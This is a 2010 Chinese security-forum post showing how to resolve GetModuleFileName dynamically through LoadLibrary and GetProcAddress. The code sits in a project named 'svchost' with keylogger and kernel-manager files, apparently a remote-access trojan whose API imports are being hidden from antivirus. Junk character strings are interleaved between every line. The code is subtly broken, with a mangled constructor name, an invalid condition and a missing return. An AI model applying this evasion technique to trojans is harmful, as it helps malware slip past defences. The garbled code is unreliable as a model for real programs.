标题:
[原创文章]
全局动态调用
[打印本页]
作者:
ice_xke
时间:
2010-10-19 12:30
标题:
全局动态调用
全局动态调用笔记
7 W* {3 k( @, P6 X
svchost files工程->插入->类(Generic Class DTDY)->DTDY.cpp DTDY.h
; u0 U" W+ K5 K/ }
----------------------------------------
6 y5 j3 `! ^# ]1 ~" ]- p9 w! C
DTDY.h:
# p) k* K9 z; ~! L# D5 D* O
4 F8 i2 p* ?' D" K# X
#if _MSC_VER>1000
% h9 P4 f* n+ U A. v% d6 J" |1 m
#pragma once
2 {4 C3 G5 {- q4 }- K! ?
#endif //_MSC_VER>1000
# }- D! R; [3 ~- t. |$ C
#include<windows.h>
- v# p" L: ] ?: U% F4 f) O
/ d, y2 ?+ A+ l& a0 L
typedef DWORD (__stdcall *pGetModuleFileNameA)(HMODULE,LPSTR,DWORD);
3 X5 Q9 v) X- v
class DTDY
- I% H/ ~$ h7 \4 q" C( J
{
[ y F2 M( |' ?+ J' f- P
public:
/ b9 U& f# {3 o
DTDY();
, N X n. Q! G) j7 n
virtual ~DTDY();
7 D/ L: }$ w( f; X9 Q. W
public:
6 v+ q+ F6 b1 h& S* A, V
static pGetModuleFileNameA MyGetModuleFileName;
9 h. }( A/ B2 t3 X p
static BOOL FunInitiallization();
$ l: y0 g, `) N1 K) x
};
4 Y5 a2 Q" f' G3 d3 [/ M
#endif
3 j: Q1 x5 w' c0 K$ P& K6 _: E7 E
----------------------------------------
% d+ p7 {* Z: R
8 [* b! N$ \) v% f- k
DTDY.cpp:
1 y# H4 P0 C# A; Q. E' l
' ]" l6 P) ?% S9 e: }! K; `0 n6 Y
#include "DTDY.h"
4 W. Y* o/ _- u U+ R/ a; e
pGetModuleFileNameA DTDY::MyGetModuleFileName=NULL;
$ o+ x7 o1 ^1 j; l+ ^
DTDY:TDY()
& w [- O1 I/ k S' R" w N
{
: |3 f9 ^- u, {
}
: g( z! X0 z x n
DTDY::~DTDY()
% E, G& Z" I1 F1 B# ^0 q! M
{
( Z' R; @2 x8 E2 \
}
0 ^! y, K1 h# _7 h: A/ m
BOOL DTDY::FunInitiallization()
) D, Q# H' h/ ^$ N
{
& b( P( K; [( U
HMODULE hModule=LoadLibrary("kernel32.dll");
/ v' e, {2 @9 Q1 P& J$ z+ O: X
MyGetModuleFileName=(pGetModuleFileNameA)GetProcAddress(hModule,"GetModuleFileNameA");
" M$ _$ Q9 v! W# G& n2 ~' A
if(!MyGetModuleFileName=) return FALSE;
: _ N9 P& P. y# H2 l
, U9 p" V3 a' O: F3 q
return TRUE;
1 E$ C; _8 V' I
}
\9 \. U+ I- X6 `9 E
----------------------------------------
. p$ P1 N7 f+ K
svchost.cpp:
# l% K4 d% q& [3 t& R
, M6 N" J' b% `! `
#include "DTDY.h"
y1 H% J, l' x; E! x" f
. e+ u% B( s/ B3 N: }+ W) t
BOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
- ^+ I; g+ z1 i! R3 m( T
{
" V ?' S, ]3 i2 v0 C
switch(ul_reason_for_call)
6 S# `; G- b. V/ P# d
{
) D+ S9 @: o/ N7 `/ U8 Y
case DLL_PROCESS_ATTACH:
" l0 t" Y( P! V6 }: |! y
if(!DTDY::FunInitiallization()) return FALSE;
* k0 H% E: N- Y) |! q
) L4 p& D5 `- W) p, V
break;
$ r, j3 t# i* x T) x
}
6 A2 b$ K4 r/ g! Z5 W, j" d3 H
}
- s; ^4 P) b1 o$ u
0 }2 z4 K( ^6 l% }1 z5 ~( D
9 k( q6 i. m" {" [8 M+ P
GetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));->goto def
% l9 ]- {$ G- v- }
改写为
- d! \* P! k" o
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));
$ ^/ @6 T l& R; A; l
----------------------------------------
& a I" B9 U+ I+ y( z4 ]- v; Q
KernelManager.cpp:
! ]0 l4 @$ Y4 v, t
# ~- I" S1 b: K" P, V' x8 p5 N
#include "../DTDY.h"
" a$ R' I/ v) X/ l
GetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
$ Y$ P8 G; E3 b/ g ~: W
改写为
6 K3 J) I5 L+ c
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
6 m* x/ Q' z0 \; s
----------------------------------------
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/)
Powered by Discuz! 7.2
